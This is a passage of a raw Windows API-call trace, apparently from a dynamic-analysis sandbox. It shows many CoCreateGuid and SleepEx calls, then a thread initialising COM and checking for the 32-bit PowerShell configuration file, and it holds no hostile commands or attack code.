pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xbc444739, Data2=0x8817, Data3=0x4412, Data4=([0]=0x94, [1]=0xd9, [2]=0x5f, [3]=0xdb, [4]=0x89, [5]=0x89, [6]=0x76, [7]=0x6e))) returned 0x0 [0098.825] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x3396b514, Data2=0x337e, Data3=0x470c, Data4=([0]=0x87, [1]=0x3e, [2]=0x60, [3]=0x98, [4]=0x4b, [5]=0xff, [6]=0x77, [7]=0x2b))) returned 0x0 [0098.826] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xbc0b653, Data2=0x8cab, Data3=0x4fd2, Data4=([0]=0xa0, [1]=0xc4, [2]=0xa1, [3]=0xa, [4]=0x92, [5]=0x7, [6]=0x34, [7]=0xf8))) returned 0x0 [0098.827] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x8686dc2e, Data2=0x6d68, Data3=0x4b00, Data4=([0]=0x88, [1]=0x14, [2]=0xbf, [3]=0x9b, [4]=0x97, [5]=0xe4, [6]=0x9, [7]=0xd8))) returned 0x0 [0098.828] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x4cb66469, Data2=0x6bce, Data3=0x40dc, Data4=([0]=0xbf, [1]=0x82, [2]=0x8b, [3]=0x4b, [4]=0x4d, [5]=0x9e, [6]=0x6, [7]=0x54))) returned 0x0 [0098.829] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xb12b3e45, Data2=0xac89, Data3=0x4eb1, Data4=([0]=0xba, [1]=0x71, [2]=0xe1, [3]=0x64, [4]=0x91, [5]=0xfe, [6]=0xa7, [7]=0x40))) returned 0x0 [0098.830] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x4dc1ff02, Data2=0x6997, Data3=0x4e8d, Data4=([0]=0xae, [1]=0xaf, [2]=0x1b, [3]=0x7d, [4]=0xf2, [5]=0x18, [6]=0xbd, [7]=0x7))) returned 0x0 [0098.831] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x8f4029a4, Data2=0x56eb, Data3=0x4f1c, Data4=([0]=0xa2, [1]=0x20, [2]=0x1d, [3]=0x84, [4]=0x5d, [5]=0x1c, [6]=0xee, [7]=0xe5))) returned 0x0 [0098.832] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x7968f6c7, Data2=0x21ab, Data3=0x4c77, Data4=([0]=0xa4, [1]=0x6f, [2]=0x3a, [3]=0x7c, [4]=0x5a, [5]=0x9b, [6]=0xe, [7]=0x67))) returned 0x0 [0098.833] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xcf2d660a, Data2=0xad46, Data3=0x4f1e, Data4=([0]=0xa6, [1]=0x25, [2]=0x1c, [3]=0x7a, [4]=0xcc, [5]=0xca, [6]=0x88, [7]=0x97))) returned 0x0 [0098.833] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xd809486f, Data2=0x5fb7, Data3=0x4ea2, Data4=([0]=0xa7, [1]=0x6c, [2]=0x23, [3]=0x13, [4]=0xb0, [5]=0xae, [6]=0x9a, [7]=0x7b))) returned 0x0 [0098.834] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xfd4ffba5, Data2=0xe953, Data3=0x4ca1, Data4=([0]=0x89, [1]=0x94, [2]=0x19, [3]=0xc, [4]=0xcd, [5]=0x98, [6]=0xd4, [7]=0x52))) returned 0x0 [0098.837] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x83cf49be, Data2=0x1bf6, Data3=0x425b, Data4=([0]=0xa4, [1]=0xb4, [2]=0x92, [3]=0x49, [4]=0x72, [5]=0xdf, [6]=0xea, [7]=0x77))) returned 0x0 [0098.838] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x3c1071be, Data2=0x2659, Data3=0x4b19, Data4=([0]=0xa9, [1]=0x47, [2]=0x8b, [3]=0x7d, [4]=0xa6, [5]=0xf, [6]=0xd, [7]=0x92))) returned 0x0 [0098.839] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x66cb4934, Data2=0xe83, Data3=0x4523, Data4=([0]=0xbe, [1]=0x72, [2]=0x42, [3]=0x70, [4]=0xf0, [5]=0xdc, [6]=0x13, [7]=0xce))) returned 0x0 [0098.839] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x4448f42, Data2=0x26c1, Data3=0x4642, Data4=([0]=0x80, [1]=0x8c, [2]=0xba, [3]=0x9f, [4]=0x94, [5]=0xf2, [6]=0x89, [7]=0xfc))) returned 0x0 [0098.839] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x3ccfcf4a, Data2=0x96e9, Data3=0x433a, Data4=([0]=0xb0, [1]=0x20, [2]=0xc5, [3]=0x60, [4]=0xc, [5]=0xb3, [6]=0xb3, [7]=0x91))) returned 0x0 [0098.839] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xf484d234, Data2=0x13d1, Data3=0x49b4, Data4=([0]=0x9d, [1]=0x76, [2]=0x86, [3]=0xfa, [4]=0x24, [5]=0xae, [6]=0x63, [7]=0xf7))) returned 0x0 [0098.840] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x8604135f, Data2=0xedc, Data3=0x45a5, Data4=([0]=0x9b, [1]=0x8d, [2]=0x7c, [3]=0x8b, [4]=0x8e, [5]=0x80, [6]=0x6c, [7]=0xb9))) returned 0x0 [0098.840] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xeb12bacb, Data2=0x5384, Data3=0x41db, Data4=([0]=0x91, [1]=0x62, [2]=0xcc, [3]=0x61, [4]=0xef, [5]=0xd4, [6]=0xd3, [7]=0xf4))) returned 0x0 [0098.840] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xbae221f0, Data2=0x1b4, Data3=0x4ab3, Data4=([0]=0x82, [1]=0xbd, [2]=0xb0, [3]=0x4f, [4]=0x91, [5]=0x24, [6]=0x51, [7]=0x7f))) returned 0x0 [0098.841] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x7cdb54f1, Data2=0x9128, Data3=0x4967, Data4=([0]=0x9f, [1]=0x3d, [2]=0x18, [3]=0xc5, [4]=0xf7, [5]=0x7a, [6]=0x87, [7]=0x5a))) returned 0x0 [0098.841] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x4116c06f, Data2=0x61e9, Data3=0x4be0, Data4=([0]=0xa8, [1]=0x15, [2]=0xee, [3]=0xd6, [4]=0x5d, [5]=0x98, [6]=0x29, [7]=0x9))) returned 0x0 [0098.842] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x5ffc2391, Data2=0x47e5, Data3=0x4d96, Data4=([0]=0x87, [1]=0xb9, [2]=0x57, [3]=0x67, [4]=0xae, [5]=0xe9, [6]=0x9f, [7]=0x77))) returned 0x0 [0098.843] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x3607427b, Data2=0xdf5a, Data3=0x4a8f, Data4=([0]=0x81, [1]=0x22, [2]=0x28, [3]=0x34, [4]=0x13, [5]=0x6c, [6]=0x35, [7]=0xd8))) returned 0x0 [0098.843] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x50f76d20, Data2=0xfe2c, Data3=0x4bc4, Data4=([0]=0xb6, [1]=0x69, [2]=0x4e, [3]=0xc6, [4]=0xe, [5]=0x27, [6]=0x7c, [7]=0x8f))) returned 0x0 [0098.846] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x6dac5c4c, Data2=0x4101, Data3=0x4abe, Data4=([0]=0xa7, [1]=0xc6, [2]=0x82, [3]=0x1b, [4]=0x9, [5]=0x90, [6]=0xd9, [7]=0x88))) returned 0x0 [0098.847] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x955870, Data2=0xab64, Data3=0x4e05, Data4=([0]=0xa5, [1]=0x18, [2]=0x8b, [3]=0x92, [4]=0xa4, [5]=0xcd, [6]=0xdd, [7]=0x35))) returned 0x0 [0098.847] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xf859fb64, Data2=0xdc5c, Data3=0x4925, Data4=([0]=0xaa, [1]=0x67, [2]=0xd9, [3]=0x14, [4]=0x9b, [5]=0xcb, [6]=0xcc, [7]=0x8a))) returned 0x0 [0098.847] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xfa1096d7, Data2=0xaabd, Data3=0x41e5, Data4=([0]=0x8e, [1]=0x50, [2]=0x61, [3]=0xb8, [4]=0x9b, [5]=0xe0, [6]=0xef, [7]=0x6d))) returned 0x0 [0098.848] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xa31e95c0, Data2=0x328d, Data3=0x49db, Data4=([0]=0xbb, [1]=0x5e, [2]=0x44, [3]=0xc3, [4]=0x66, [5]=0x50, [6]=0x9e, [7]=0x33))) returned 0x0 [0098.848] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xf1df2dcd, Data2=0xdb25, Data3=0x4cd5, Data4=([0]=0x88, [1]=0x68, [2]=0x3a, [3]=0x8, [4]=0x43, [5]=0x7f, [6]=0x7d, [7]=0xa6))) returned 0x0 [0098.849] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x11ade353, Data2=0x258a, Data3=0x411e, Data4=([0]=0xae, [1]=0xe0, [2]=0xda, [3]=0x96, [4]=0x4d, [5]=0xdc, [6]=0x73, [7]=0xda))) returned 0x0 [0098.850] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xfae772d8, Data2=0x1602, Data3=0x476d, Data4=([0]=0x90, [1]=0x74, [2]=0xfd, [3]=0x58, [4]=0x68, [5]=0xd3, [6]=0xef, [7]=0x2d))) returned 0x0 [0098.851] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x63118008, Data2=0x5ea0, Data3=0x4e94, Data4=([0]=0xbd, [1]=0x70, [2]=0x40, [3]=0x55, [4]=0x82, [5]=0x70, [6]=0x67, [7]=0x2a))) returned 0x0 [0098.851] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xcb12436d, Data2=0x8aab, Data3=0x4686, Data4=([0]=0xa1, [1]=0x83, [2]=0x70, [3]=0xed, [4]=0x15, [5]=0xcc, [6]=0xe4, [7]=0x67))) returned 0x0 [0098.852] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x78c54c65, Data2=0x935e, Data3=0x4bdb, Data4=([0]=0x9d, [1]=0x89, [2]=0xaa, [3]=0xa7, [4]=0xab, [5]=0x3a, [6]=0x83, [7]=0x51))) returned 0x0 [0098.852] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xad4ab013, Data2=0x3d5, Data3=0x4939, Data4=([0]=0x94, [1]=0xac, [2]=0x68, [3]=0x3f, [4]=0xc1, [5]=0x4d, [6]=0x27, [7]=0xe3))) returned 0x0 [0098.852] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x4fc8b0d9, Data2=0x792f, Data3=0x4dbc, Data4=([0]=0xba, [1]=0x7d, [2]=0xe5, [3]=0xe9, [4]=0x1f, [5]=0x7c, [6]=0x1f, [7]=0xc))) returned 0x0 [0098.853] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x87f1e5fd, Data2=0xe29e, Data3=0x4417, Data4=([0]=0x90, [1]=0xf, [2]=0xa7, [3]=0x11, [4]=0x8f, [5]=0x7d, [6]=0x48, [7]=0xec))) returned 0x0 [0098.853] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x66ae116c, Data2=0x3595, Data3=0x44dd, Data4=([0]=0xad, [1]=0x39, [2]=0x25, [3]=0x1, [4]=0x37, [5]=0x51, [6]=0x93, [7]=0x63))) returned 0x0 [0098.854] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xdc1d0bc3, Data2=0x4fc0, Data3=0x44e8, Data4=([0]=0x8d, [1]=0x23, [2]=0x4d, [3]=0xcf, [4]=0xf2, [5]=0x90, [6]=0x9, [7]=0x9f))) returned 0x0 [0098.854] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xb7063f83, Data2=0x2996, Data3=0x4699, Data4=([0]=0x9a, [1]=0x71, [2]=0xf5, [3]=0x4d, [4]=0xfc, [5]=0xa7, [6]=0xa, [7]=0x6d))) returned 0x0 [0098.855] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xf44abc5, Data2=0xed85, Data3=0x4fe8, Data4=([0]=0xb0, [1]=0x92, [2]=0x45, [3]=0xc, [4]=0x46, [5]=0x69, [6]=0x3d, [7]=0xc6))) returned 0x0 [0098.855] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x400a2776, Data2=0x18c1, Data3=0x4ca9, Data4=([0]=0x80, [1]=0x5c, [2]=0x42, [3]=0x43, [4]=0xda, [5]=0x1b, [6]=0x84, [7]=0xa1))) returned 0x0 [0098.856] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xb843f01e, Data2=0x2cf1, Data3=0x435b, Data4=([0]=0xa2, [1]=0x28, [2]=0xe6, [3]=0xa2, [4]=0xfb, [5]=0xc7, [6]=0x98, [7]=0x94))) returned 0x0 [0098.979] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x5b844352, Data2=0xd145, Data3=0x4b1e, Data4=([0]=0xa6, [1]=0x3f, [2]=0xee, [3]=0x76, [4]=0xbc, [5]=0xbe, [6]=0x4c, [7]=0xfc))) returned 0x0 [0098.980] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x754c989b, Data2=0xc56, Data3=0x4391, Data4=([0]=0xa2, [1]=0xfd, [2]=0x8e, [3]=0x8f, [4]=0x1d, [5]=0xd0, [6]=0xa2, [7]=0xfd))) returned 0x0 [0098.980] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x43915ed2, Data2=0x403d, Data3=0x4c1b, Data4=([0]=0xb9, [1]=0xc9, [2]=0x1, [3]=0x3e, [4]=0x73, [5]=0xd9, [6]=0x41, [7]=0x7f))) returned 0x0 [0098.981] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x9332ee3f, Data2=0xdc4d, Data3=0x4b8c, Data4=([0]=0x9c, [1]=0xd, [2]=0x58, [3]=0xf4, [4]=0x7b, [5]=0x72, [6]=0x25, [7]=0xa4))) returned 0x0 [0098.981] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x31a890c0, Data2=0x2109, Data3=0x442c, Data4=([0]=0x9e, [1]=0xe0, [2]=0x57, [3]=0x49, [4]=0x5e, [5]=0x40, [6]=0x37, [7]=0x4f))) returned 0x0 [0098.982] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xbf52d0b0, Data2=0xac0f, Data3=0x4bb9, Data4=([0]=0xa8, [1]=0xc2, [2]=0x8f, [3]=0x54, [4]=0x9, [5]=0x41, [6]=0x25, [7]=0xf2))) returned 0x0 [0098.983] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xaf7d3d62, Data2=0x160a, Data3=0x4717, Data4=([0]=0x85, [1]=0xf9, [2]=0x4d, [3]=0xb9, [4]=0x40, [5]=0x8e, [6]=0xaf, [7]=0x31))) returned 0x0 [0098.983] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xf71da83d, Data2=0x4ce, Data3=0x4a3b, Data4=([0]=0xa1, [1]=0xf, [2]=0x26, [3]=0x4b, [4]=0x2e, [5]=0x75, [6]=0x81, [7]=0xfe))) returned 0x0 [0098.984] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x521f438f, Data2=0x4dc, Data3=0x4899, Data4=([0]=0x95, [1]=0xfe, [2]=0x69, [3]=0x7f, [4]=0x21, [5]=0x7c, [6]=0x54, [7]=0x10))) returned 0x0 [0098.984] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x6bb0e829, Data2=0x190, Data3=0x48af, Data4=([0]=0x92, [1]=0x5a, [2]=0xa4, [3]=0xd8, [4]=0x67, [5]=0x60, [6]=0x39, [7]=0x47))) returned 0x0 [0098.985] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x75166765, Data2=0xb63c, Data3=0x4fdd, Data4=([0]=0x89, [1]=0x76, [2]=0x84, [3]=0xfd, [4]=0x5e, [5]=0x95, [6]=0x57, [7]=0x10))) returned 0x0 [0098.985] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x5f0f4a67, Data2=0xf71, Data3=0x4f02, Data4=([0]=0x8d, [1]=0xa0, [2]=0x3c, [3]=0xff, [4]=0x59, [5]=0xb1, [6]=0x26, [7]=0x61))) returned 0x0 [0098.985] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x51cb4e85, Data2=0x9737, Data3=0x4b6f, Data4=([0]=0x96, [1]=0x5e, [2]=0x3a, [3]=0xcc, [4]=0xc0, [5]=0x48, [6]=0xd8, [7]=0x8c))) returned 0x0 [0098.986] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x2ac9d3f8, Data2=0x1b52, Data3=0x4a55, Data4=([0]=0x97, [1]=0x40, [2]=0x12, [3]=0x78, [4]=0xbd, [5]=0x87, [6]=0x2, [7]=0x63))) returned 0x0 [0098.986] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x1b8c5c47, Data2=0xb87b, Data3=0x48b6, Data4=([0]=0xae, [1]=0x11, [2]=0xc7, [3]=0xff, [4]=0xc7, [5]=0xc9, [6]=0xa7, [7]=0xd7))) returned 0x0 [0098.987] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x4a935f0a, Data2=0x132d, Data3=0x4064, Data4=([0]=0x9a, [1]=0xa4, [2]=0xc2, [3]=0xd2, [4]=0x91, [5]=0xf8, [6]=0xd1, [7]=0x40))) returned 0x0 [0098.987] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xa6fc85f6, Data2=0xb717, Data3=0x4c80, Data4=([0]=0xaa, [1]=0xd5, [2]=0x14, [3]=0x2b, [4]=0xcf, [5]=0xd, [6]=0xe7, [7]=0x8b))) returned 0x0 [0098.987] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xa024fc6b, Data2=0x72e5, Data3=0x47c4, Data4=([0]=0xbb, [1]=0x35, [2]=0x37, [3]=0x46, [4]=0x12, [5]=0x6d, [6]=0x38, [7]=0xc7))) returned 0x0 [0098.988] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xb214ef78, Data2=0xa52e, Data3=0x47c0, Data4=([0]=0xad, [1]=0x6f, [2]=0x72, [3]=0xad, [4]=0xfb, [5]=0x5b, [6]=0x49, [7]=0x77))) returned 0x0 [0098.988] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x783721c4, Data2=0x92ad, Data3=0x42ca, Data4=([0]=0xa5, [1]=0x26, [2]=0x0, [3]=0xa2, [4]=0x3a, [5]=0xdd, [6]=0x64, [7]=0x41))) returned 0x0 [0098.988] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x38161350, Data2=0x95d1, Data3=0x4b16, Data4=([0]=0x88, [1]=0x4a, [2]=0xce, [3]=0x77, [4]=0x1e, [5]=0xf1, [6]=0x4c, [7]=0xcc))) returned 0x0 [0098.988] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x9b57428c, Data2=0xa215, Data3=0x42c0, Data4=([0]=0xa4, [1]=0x3b, [2]=0x41, [3]=0x4f, [4]=0xf5, [5]=0x33, [6]=0xb, [7]=0x49))) returned 0x0 [0098.989] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x5f557d87, Data2=0xd6e1, Data3=0x494b, Data4=([0]=0xb8, [1]=0x19, [2]=0x41, [3]=0x14, [4]=0xa6, [5]=0xcb, [6]=0xec, [7]=0x2a))) returned 0x0 [0098.989] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xabb35520, Data2=0x7547, Data3=0x4457, Data4=([0]=0xbe, [1]=0x2c, [2]=0x68, [3]=0x9d, [4]=0xd3, [5]=0x66, [6]=0xc6, [7]=0xa4))) returned 0x0 [0098.990] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x53666604, Data2=0x18c9, Data3=0x4b20, Data4=([0]=0xb7, [1]=0x1b, [2]=0xc3, [3]=0x6e, [4]=0x73, [5]=0xf7, [6]=0x18, [7]=0x5a))) returned 0x0 [0098.990] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x11e2e07b, Data2=0x8d97, Data3=0x41fa, Data4=([0]=0x90, [1]=0xca, [2]=0x71, [3]=0xf9, [4]=0x66, [5]=0xd3, [6]=0x48, [7]=0x5c))) returned 0x0 [0098.991] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x3d973a7, Data2=0x7eda, Data3=0x4772, Data4=([0]=0x85, [1]=0x59, [2]=0xdb, [3]=0x0, [4]=0x2a, [5]=0xf1, [6]=0x78, [7]=0xea))) returned 0x0 [0098.991] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x3635a7f2, Data2=0x7f38, Data3=0x4146, Data4=([0]=0x8e, [1]=0x50, [2]=0xb1, [3]=0x69, [4]=0xdf, [5]=0x7b, [6]=0xb3, [7]=0x26))) returned 0x0 [0098.992] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xaa526fe3, Data2=0xc933, Data3=0x463b, Data4=([0]=0xa3, [1]=0x32, [2]=0x5d, [3]=0x12, [4]=0x8c, [5]=0xa2, [6]=0xe0, [7]=0xc1))) returned 0x0 [0098.996] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.157] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.289] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.467] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.568] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.654] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.783] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.865] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.912] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0100.002] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0100.125] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0100.229] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0100.459] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0100.595] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0100.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0100.876] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.001] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.262] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.454] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.582] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.693] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.769] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.939] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0102.082] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.127] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.315] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.765] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.934] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.055] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.138] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.213] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.335] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.388] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.551] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.815] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0109.159] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0109.315] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0109.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0109.706] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0114.295] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0114.419] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0114.698] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.043] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.303] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.349] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.476] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.643] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.751] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.863] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.966] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0116.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0116.224] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0116.349] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0116.450] SleepEx (dwMilliseconds=0x0, bAlertable=0) Thread: id = 40 os_tid = 0x880 Thread: id = 41 os_tid = 0x12c4 [0077.224] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0077.229] CoGetContextToken (in: pToken=0x6d3f974 | out: pToken=0x6d3f974) returned 0x0 [0077.229] CObjectContext::QueryInterface () returned 0x0 [0077.229] CObjectContext::GetCurrentThreadType () returned 0x0 [0077.229] Release () returned 0x0 [0077.229] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0077.229] CoUninitialize () [0077.230] RoInitialize () returned 0x1 [0077.230] RoUninitialize () returned 0x0 [0077.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x6d3ed9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0077.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d3f258) returned 1 [0077.268] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x6d3f2d4 | out: lpFileInformation=0x6d3f2d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0077.268] 